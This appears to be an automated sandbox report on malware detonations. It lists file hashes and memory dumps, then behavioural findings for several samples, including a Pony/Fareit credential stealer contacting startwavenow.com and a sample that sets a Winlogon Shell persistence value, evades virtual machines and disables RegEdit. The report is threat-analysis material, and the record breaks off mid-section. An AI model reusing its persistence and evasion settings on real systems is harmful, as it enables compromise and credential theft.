SHA256 f2bc07b7406d3daf4bc0fdafe8b0ad8b18a9aeb34a57b6171de5ee4ad99d3040
SHA512 a089fafb0d302dc1eecf176ddcd6871ea75a05cc312dfd9336fd0b295a9587f6ac9ab9cdcd72e76b8fceb6d36af5c893234c50c68cafcb34b783ca3dc2c88f19

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_bullets.gif

MD5 9209096d26a7584a446dfdada57b7a67
SHA1 523bc3b4e8b96796e50583ffe7fa1aa27886c4cf
SHA256 dce670ef8b5133bdb8aabb6a879781b9659b762d0f0bd8aabdfe2d98547ae295
SHA512 d429bc57ae8ec9f186916eb613c0047ad4d0ae5fcb5808a752bf6e4e765ac5504d07999ce2e2d4a4196611a3530fc750473329ba65e4e45a352971825945c8e3

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_center.gif

MD5 6b360522c0a6d1ee55a67d089ddf0f29
SHA1 1e2e5b665bedf137cc4e58f827fb7e9903cbf39e
SHA256 b5a34b6bbad13d49c6f5e0793ab5bdac864a819861c8337c6d314290f707f171
SHA512 4c3cdfd62e13c996ae66e21d110452f6c40f1aece8ea8761ae3bc6790d6e9cd63059844354d3d85b3dba8ea329b7da126809c380f41a8ba8a8d032bf7aee44c4

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_decreaseindent.gif

MD5 4b1cd6066e490abe16e551f1a42ee64b
SHA1 9c45228bfdc5625e52e89f2b5a6376aa8a090026
SHA256 910719ba4e9b4ed7eb4ccf15d9871ac6005a45a89e97ce1853efd7df792a5377
SHA512 69c151fea024d1e638b628ef2aaa118fa517ee66ed761b1fcf606730125452f766f4c86de05d0998a60a73c29305e3db75b3f375c462c87b9c42fe79799c4136

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_increaseindent.gif

MD5 41991d08bd78f990c889d6db5a53003e
SHA1 1fe11ff2c51d62e580cdcd31e4e701c35607d456
SHA256 3068f98d266e2261cab19df9faad1d43dc768699b7a1b84ac7837d21870c0b09
SHA512 5fc7e42dba9cb4f8dafedf5f97e1cafc74e55d249132dbbe7f714803bf8c27cd520a7f1d360fd86c9d7706b92aaaf7a90ea4f52ce61cc1b106864089d7dc1615

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_justify.gif

MD5 67685085388206e7db1a49b9d4d6d82a
SHA1 d046e3c3a38e4638f4618be3ab164b61d2644223
SHA256 f8b3624d659d696e22f893628d1f35e84ef2b2afd7ec80c580110c174dee3f3a
SHA512 0d2880efd1f05ad14aeb899a8ef4dd9a24bd96586992cc33fc7d17c0e5292dcc73a68f97754f5d316e8c62ca7240cc81872c259e6ddee7447a811fa709471bb2

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_pressed.gif

MD5 6082b4e9de8e9d5e8f12ae41269f727a
SHA1 6db11244432f1852d5681c685562aeac7830edcb
SHA256 a995aaf5ca5e61648038fd611aaf5d67bfcaab564e922d81a86167337fed7d0e
SHA512 0c6d0baccfdcb2d999fa39239a3a8768035d4453e8269229ae57a41ac38c68509e9fbd08ddc8ce938c90f327acf2f64540dd607640adde0ec3f4aadc02c30f6a

memory/2212-5556-0x000007FEF5AF0000-0x000007FEF648D000-memory.dmp

C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Windows Explorer.lnk

MD5 d26083f769cf85ce320f62a2be371418
SHA1 425a4e8f050f6afd72115eae9d0ca05ec5602bda
SHA256 0391844bb9a47e9d00e29cf4bb8e3eee6cb1aa7dc0ac2e5f6e3800d6440dc65d
SHA512 26ceaf41d533d98564db6be827454849ecae324dba4c98345314dd04c8369a91c318637e7e0d6ecb9a5b3f69d201adc1be0e29a527e35c2a85ca0c7191710f91

memory/2212-6488-0x000007FEF5DAE000-0x000007FEF5DAF000-memory.dmp

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ASP.NETWebAdminFiles\Images\security_watermark.jpg

MD5 c14d68797611f380bdd91c2ee4dcb1fc
SHA1 33226013b3898f453f0662f5cf2a06a8846466ea
SHA256 74307ffea174c4874e84e7ab40f3e0fe9940b303943f82a5e6253091056bb00d
SHA512 53f5b10ed55f115e26d43f36c054db0654aaca77956fcfc538c3a55d4c602410785c1d387e581aa64710e8bee398163cf2fc3bc6ba0d0ad28ef51cfaa20259df

memory/2516-9285-0x0000000000400000-0x00000000006F6000-memory.dmp

memory/2516-9291-0x0000000000400000-0x00000000006F6000-memory.dmp

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\alert_lrg.gif

MD5 a257ae0e33925d4ad8a41ea4d6ebb876
SHA1 efed317c1e5c5fc02cd29cf6a9e48ed71bce6fad
SHA256 bc3152c6868f9864a33659ad773ea4e8f5caffd9a34fd2829e1795258a3ecdd5
SHA512 ead5bacf05bbf73770838e54000547f1708b8eb7959b25421c584dcd71dd9c4a0053f45900d52755b61e579835394a6ba79c858c5176d7321d8b90ab06f5235a

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\topGradRepeat.jpg

MD5 6e6959aab2ae07e740d996e389ebcc78
SHA1 63ec7e084e0250a9de38cd28f96ce30036019b8e
SHA256 bc4db6d8665f6e81b31ad715b88493b713098c4d23fe17d9e3adf8df0fe5ba40
SHA512 6d270509e776314d0c9874622d7dc6a85f9374ed070bf19dbd4466486d92fd90599c5e3c9ce6428307878fd027cb2b3c6dc87fbcc5a14d1f9059347ace01ac93

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\yellowCORNER.gif

MD5 78e808f7b1cadbb3ce9b0689836b8c5f
SHA1 4233a84cf60ac95bae40d9cda62db32849d35916
SHA256 d3a074bf3b73fe913ded4177522930d6fa0a3110d0787245625f0f5ca41de2bb
SHA512 71027d9fdff72760de3aaf412e4c73f716f1d93c7978ef0e8ff97123456f112d660d2d854cdf50c854408bb29784850bb0e00b93ba7c421e0337a22f09da46c7

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\unSelectedTab_rightCorner.gif

MD5 bb59186d7739d3e885fae242e255881b
SHA1 a5e8ab8821196d3ac2fd1e46041b9edb06a8ef52
SHA256 09327ade0bf59d34a0dfe0dc0586bcd72e6ecb0d3d3a878af1f8f3b65eac5863
SHA512 e9cfc4ba1bb6b505db93250368f457e1cbaae1de5ba575c673767f1674f584fb9f6bad9900589dfc489ff767351f21484124b7828357a0ee680cb372620b2949

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\unSelectedTab_leftCorner.gif

MD5 8e7cbd8b583c6bcd24135bcb62e46b03
SHA1 cd33012c7a7a3cb0fa9f7b6b56bd781b80b4f6ee
SHA256 de20764e8f93dc820da2733d29244cb1b9da250c705089432479df72e8c2d3dd
SHA512 012eb2a3f265369482215860fb42a555fc854d8a6e8c7fd045bf0ca68f48d81df5563bde02c060f324f075dc7fe3d0899e27d105b6daa15b69716f5cadd2e0fa

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\selectedTab_rightCorner.gif

MD5 a5307772b89c661fd285a7788d484c72
SHA1 ce1b7ab3b8e720bc45ebc99c0b33718205e245ae
SHA256 3b4b395fa09e5b7c3a3234fc6bda0798841608a8cd0f300c4d4aa93baf8038ac
SHA512 81c0b723e9b94db204bbcd8763e4d457799d2a85ed76631aa660350352a921cebe33cdb82ad3a02bb7fb8373a27d8e47a1b06e926ebbe5ddba03186eb1a03250

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\selectedTab_leftCorner.gif

MD5 265d255c861ceca1c51afc43bcc59997
SHA1 5763fc795427713b72319aba062201bf2160378a
SHA256 c8320ab10e9c34ca32dab78628308d315323c0e0959d4071753d1c4f33c9916d
SHA512 6152438eaf457236375d8da32ac7dec0a74b11ff9fd66e096483c626d4883877b8bbf830190bdeea3931a04f7213aeea460cfedea079478d444fa33d8d1b76e5

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\requiredBang.gif

MD5 2559bd03e2f2391c94bf6aaffb47b18a
SHA1 98c6423ebbbf262bc4f700108dba93e7afb221cc
SHA256 0827a735e5234c95a94b647846ee6cb6ff273cb297dd78c15f17758350589d6e
SHA512 b680ad7ead5a0bfacb7e62e93b3ccb52c393a3ddf6cb770e29c295436066ff9c081bcdf388210fd9bddbce35e8282e39e166f36208df41d46cdf12700ccc1fdd

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\image2.gif

MD5 a24c7c47ac991d4879649107b26dbf08
SHA1 0dd1ee909ed32236d5e2868e26187076c6b24571
SHA256 49231955e9830bd6b7470bb78c0bf56ea6a41f8f73559ca34008c6aa1249a2fd
SHA512 21b06adc8537e1e418c87fc6331e2456102501a881292657c7348ef124c21f7745f8a3d0945b678c7b67acc75aa50ce51649b2c363eddafdaa4ed17b962c89b8

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\image1.gif

MD5 7284c6d1ac8752859b6253dfe278cb3f
SHA1 eab374c8f943ee98a89ccfb3e8fd5f0288f5982d
SHA256 b332e638a13dd5a09ac24d12d042eec5128a535a7f405f1834f3edbc49e0650e
SHA512 0de716de80bf2c5fd9cb468898f954947d3e3c3b3011499e88a605ecda3f162cb8575f5d78495bda903b4f458a79ef9d2c6c224c91cccc9c95ff287522cfbead

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\HelpIcon_solid.gif

MD5 333d615b962a856edbb59ad0fcb7b27e
SHA1 6cee1a1089910c52d0b5aa7a4dd29d5103a2fc69
SHA256 a8e9bc212948414d29515240329207cc22d3672a0afc0ff234cd06aba6a4964c
SHA512 66a0747444d4d5f3a941a4fb7c9325cfcb25522007395504560311b41b8c8f04af43f09aa365e261a2cfaf8f62d11189388d700e7af385f4c114083d5709f2ef

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\help.jpg

MD5 861c6c0a45151493d6602a391cabbe72
SHA1 581949f56083c887f82ed67de5adb7cc01fed64f
SHA256 8b37301d4cb94ebd50a659f7e734e66e6b5be31c713b819f192ae8f532782861
SHA512 3f921e1d1dd3c7a8d12c87dcd2d2fcb4d6122e109d767368482c899e5c1601edbbf874923a1c38dbe96e2f6ad61e8076985857b935d8efe49bcf1be1f64475ff

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\headerGRADIENT_Tall.gif

MD5 5803eced3d1c20b86108920207db1ef8
SHA1 48e1ba14b2029c0a7c6bf3f4ef84238e2a918079
SHA256 9dcae8f12a6faf5b1cf1aa790dbb8e6a9307af8770d7a49dce05523fa14f1fb1
SHA512 eca6d1ece5e367157d41227229a86997ac76f3dd822bc890518362a54be83f151dcac6c1e12c44c65f7b77cd9b447b83b5861f364779409f0be23115a4d5c004

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\gradient_onWhite.gif

MD5 7b05bb093991e39277442adf3e32c060
SHA1 59480193ebee5e1a829c98b252d56ad929afaeb0
SHA256 d2f92bf5a025d3ed33b296cee1aeff8765d1287474122baa70fc368c1d7f3aa0
SHA512 856b540bd7b8388da0f7dfa00ac88afad67c516d58a4335fcba5398a88a7836df2e9cd319554b2a3c5ae8d1a79d4ecf53ad867921549cacab1aab1c5ac468360

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\gradient_onBlue.gif

MD5 6d125cafce26d3dee20e631428a81a78
SHA1 9eb4d460a2f3716ebea2a83415a2db9a52e65999
SHA256 5488de1b83ac81a986b29a4c4696900367ab8f55bdceac4f6607834eecc37eb9
SHA512 e4cbe061169f70d206e7266e942139d336eb9ad1e8b15a82cb38b5a62bf1b89d6fe9586a095ab81d7e33606a5853137015bbb36641091245821466026e6ca83a

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\folder.gif

MD5 8eac0ec9ab95a16d67c01372822206f6
SHA1 b461a7b6e7c1e6c5f7b6f9f30588395fafc8bcdd
SHA256 d5b6069c5d8eb2471b5daab07224fb4782beaeee76755da1a36d4454e71516d0
SHA512 4dfac9d520d8a7c1b04e687a10c4be2f941accd3ef8c9a4811d8a84b78ad8426630d7475e7b16f8bbfb06bb01e9f93c0a35af92eeff9c74555398252a440b53c

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\deselectedTab_1x1.gif

MD5 1d3e3654200a3855c1fed467386bd564
SHA1 59299952f8d64d6dfdbc81bcd5f11dd28e069d72
SHA256 c056f3fdf7f5d1ab521b1d90f6568ce402aaedfface03470b65a1754c9c199a9
SHA512 5c97a90bad5fe3211b7d75ab4532009d8e2300a93c937595254cdacdde0efaed41265e4b2ddab7f804b4494767ad4b9764c9b2fa5f0f8bd9991e7d705cb8623c

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\darkBlue_GRAD.jpg

MD5 99d73fde86fc47e6c535ac5f10311e35
SHA1 562618cbab46da52af2fd59b23f3792a7e24468c
SHA256 bc0764d4d45ab57c8b3b84bf23b6d42ea2a764066f3b210a66cd89bccb3d1904
SHA512 fddd08cbd2acd5865ff677a3100314d22609ebb240ef860075deca15cd90ffa0ce14861d38e4e56e6fa872ee759a5c88cc0e2e719f7b0c9220fcdafd914b6428

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\branding_Full2.gif

MD5 dfeda6cfcf05d0fd48d2892f00f097ef
SHA1 89c3937ee224d27f31af79e6773b8d5417755ae6
SHA256 974c9ca27dc6736ca339e65f7775d1c8551e05108bb6d97d92c3451ca991f973
SHA512 32b419d2e8fdc14b1bd6033475a7414e3cb419f1f1ccfb13cf8d9c02dec67b2d456b87b4e3c8d018b64bf6d37f71d0968fd49e57b1bf46b6ac5d3c22cc07f216

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\aspx_file.gif

MD5 98dd607a669919361f747fbb7a47c712
SHA1 002ce46c900c64ede0b1c8160186f2800feb8e3d
SHA256 6eda0990cfee043b9382ded6e0dfae4f6e4321dff8cae138c64f8b7f00d56dc6
SHA512 9eba15904ce14a96ff62ad5a03bf927f124e1fb8c525a2de8ec0e2c3bd93c7c7ca5c0867fbae9c8081aeb35d0bdfb659f7d488a62f6f8b596c16b1b194a19cca

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\ASPdotNET_logo.jpg

MD5 3717e294bf32cef11f170bfd6358d1f9
SHA1 3038e4d2da3273a8d3c9417e47308515c0d07d1e
SHA256 e1689ac9b81cafa33998c3dafc3f773ef1580173be08f11705f28723b9e601f1
SHA512 a43ebf78153a07f5c4df809727d5a4e4ae2b45d4a67ee60199c2fdabde12c9094fa306e86ed17ff0b19bb2eb4fd030ea76c86aff9dac38b86a0d6e3e0d283bdf

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe

MD5 de48aef1ce17546a84b0995e14b277eb
SHA1 87a43910a7c13b7caa5b26338a6b36bf27942444
SHA256 00ca13d6dad70b2f65e3d2ab77e3c0f1642104a1bc08a8ecd1e86fbc875e0c84
SHA512 0fea582ebff46fa0219e5257c97a388aaeb9351351aeb3cbb068c9c047ac6010ea4b42c9cf78515d12e7ce6d4821efffa649685019917e4bea7f3da81a66678d

memory/2516-9900-0x0000000000400000-0x00000000006F6000-memory.dmp

memory/2516-9901-0x0000000000400000-0x00000000006F6000-memory.dmp

memory/2516-9904-0x0000000000400000-0x00000000006F6000-memory.dmp

memory/2212-9905-0x000007FEF5AF0000-0x000007FEF648D000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:20

Platform

win7-20240903-en

Max time kernel

361s

Max time network

362s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ea8292721a34ca2f1831447868bbe91e.exe"

Signatures

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2600 set thread context of 1360 N/A C:\Users\Admin\AppData\Local\Temp\ea8292721a34ca2f1831447868bbe91e.exe C:\Users\Admin\AppData\Local\Temp\ea8292721a34ca2f1831447868bbe91e.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\ea8292721a34ca2f1831447868bbe91e.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2600 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\ea8292721a34ca2f1831447868bbe91e.exe C:\Users\Admin\AppData\Local\Temp\ea8292721a34ca2f1831447868bbe91e.exe
PID 2600 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\ea8292721a34ca2f1831447868bbe91e.exe C:\Users\Admin\AppData\Local\Temp\ea8292721a34ca2f1831447868bbe91e.exe
PID 2600 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\ea8292721a34ca2f1831447868bbe91e.exe C:\Users\Admin\AppData\Local\Temp\ea8292721a34ca2f1831447868bbe91e.exe
PID 2600 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\ea8292721a34ca2f1831447868bbe91e.exe C:\Users\Admin\AppData\Local\Temp\ea8292721a34ca2f1831447868bbe91e.exe
PID 2600 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\ea8292721a34ca2f1831447868bbe91e.exe C:\Users\Admin\AppData\Local\Temp\ea8292721a34ca2f1831447868bbe91e.exe
PID 2600 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\ea8292721a34ca2f1831447868bbe91e.exe C:\Users\Admin\AppData\Local\Temp\ea8292721a34ca2f1831447868bbe91e.exe
PID 2600 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\ea8292721a34ca2f1831447868bbe91e.exe C:\Users\Admin\AppData\Local\Temp\ea8292721a34ca2f1831447868bbe91e.exe
PID 2600 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\ea8292721a34ca2f1831447868bbe91e.exe C:\Users\Admin\AppData\Local\Temp\ea8292721a34ca2f1831447868bbe91e.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ea8292721a34ca2f1831447868bbe91e.exe

"C:\Users\Admin\AppData\Local\Temp\ea8292721a34ca2f1831447868bbe91e.exe"

C:\Users\Admin\AppData\Local\Temp\ea8292721a34ca2f1831447868bbe91e.exe

"C:\Users\Admin\AppData\Local\Temp\ea8292721a34ca2f1831447868bbe91e.exe"

Network

N/A

Files

memory/1360-0-0x0000000000400000-0x0000000000412000-memory.dmp

memory/1360-8-0x0000000000400000-0x0000000000412000-memory.dmp

memory/1360-6-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1360-4-0x0000000000400000-0x0000000000412000-memory.dmp

memory/1360-2-0x0000000000400000-0x0000000000412000-memory.dmp

memory/1360-12-0x0000000000400000-0x0000000000412000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:20

Platform

win7-20241023-en

Max time kernel

567s

Max time network

360s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\edffa07d667dbd224682639f56eb1b913e4ffeac874999e02c23e86eeb6489d5.js

Signatures

Pony family

pony

Pony,Fareit

rat spyware stealer pony

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Documents\st.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Users\Admin\Documents\st.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\Documents\st.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\edffa07d667dbd224682639f56eb1b913e4ffeac874999e02c23e86eeb6489d5.js argument" C:\Windows\system32\wscript.exe N/A

Checks installed software on the system

discovery

Command and Scripting Interpreter: JavaScript

execution

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Documents\st.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: 33 N/A C:\Users\Admin\Documents\st.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Documents\st.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Documents\st.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\Documents\st.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\Documents\st.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\Documents\st.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Documents\st.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\Documents\st.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\Documents\st.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\Documents\st.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Documents\st.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\Documents\st.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\Documents\st.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\Documents\st.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Documents\st.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\Documents\st.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\Documents\st.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\Documents\st.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Documents\st.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\Documents\st.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\Documents\st.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\Documents\st.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Documents\st.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\Documents\st.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\Documents\st.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\Documents\st.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Documents\st.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\Documents\st.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\Documents\st.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\Documents\st.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Documents\st.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\Documents\st.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\Documents\st.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\Documents\st.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\Documents\st.exe N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\edffa07d667dbd224682639f56eb1b913e4ffeac874999e02c23e86eeb6489d5.js

C:\Program Files\Windows NT\Accessories\wordpad.exe

"C:\Program Files\Windows NT\Accessories\wordpad.exe" "C:\Users\Admin\Documents\doc_attached_4QAyw"

C:\Users\Admin\Documents\st.exe

"C:\Users\Admin\Documents\st.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 startwavenow.com udp
US 8.8.8.8:53 startwavenow.com udp
US 8.8.8.8:53 startwavenow.com udp

Files

C:\Users\Admin\Documents\doc_attached_4QAyw

MD5 a1fa80f75ad4003549d27fc726e40b14
SHA1 5fda8ead11d5bdcc51c29f9eb72aed29f2065d31
SHA256 37ab62998175d3dc70763e2fcbfe1e5b38660ae59a1c21c0306f2470ea487364
SHA512 34817bda5cbcb2e0a909d8652b2b82c3471696f4e4d533e8a1e3583811a60aa0365e4ceabd3d2ded506a577decf907bc6bead917ffef1317e758ea2f82c1c554

memory/2008-2-0x0000000002120000-0x0000000002121000-memory.dmp

memory/2008-3-0x0000000002120000-0x0000000002121000-memory.dmp

C:\Users\Admin\Documents\st.exe

MD5 39c27aec900d0613e02b78df2333657c
SHA1 822bf6d0eb04df65c072b51100c5c852761e7c9e
SHA256 dabee7680e09565154e7807c1ed362838ad6ee4e373ee97069e3b33db1ec10f7
SHA512 316497a6973ea6c7883b3112b1d5a7f042f654f807ac8b2919e42719f384469cc5d7d39112982bee0d18900ee6f76dd00664d206f5f13d6448dd27a3c84c1880

memory/2916-10-0x0000000000290000-0x0000000000291000-memory.dmp

memory/2916-9-0x0000000000250000-0x0000000000265000-memory.dmp

memory/2916-11-0x0000000000400000-0x000000000041A000-memory.dmp

memory/2916-12-0x0000000000400000-0x0000000000437000-memory.dmp

memory/2916-13-0x0000000000400000-0x000000000041A000-memory.dmp

memory/2916-14-0x0000000000400000-0x0000000000437000-memory.dmp

memory/2916-15-0x0000000000400000-0x000000000041A000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:10

Platform

win7-20240903-en

Max time kernel

550s

Max time network

362s

Command Line

"C:\Users\Admin\AppData\Local\Temp\F45F47EDCED7FAC5A99C45AB4B8C2D54.exe"

Signatures

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,C:\\Users\\Admin\\AppData\\Local\\Temp\\ziylmpcea.exe" C:\Windows\SysWOW64\ctfmon.exe N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\F45F47EDCED7FAC5A99C45AB4B8C2D54.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\ywicmnfzby.$00.exe N/A

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Windows\SysWOW64\ctfmon.exe N/A

Disables Task Manager via registry modification

evasion

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\ctfmon.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ywicmnfzby.$00.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\ctfmon.exe N/A
N/A N/A C:\Windows\SysWOW64\ctfmon.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\F45F47EDCED7FAC5A99C45AB4B8C2D54.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\ctfmon.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\ywicmnfzby.$00.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\ctfmon.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\F45F47EDCED7FAC5A99C45AB4B8C2D54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ywicmnfzby.$00.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
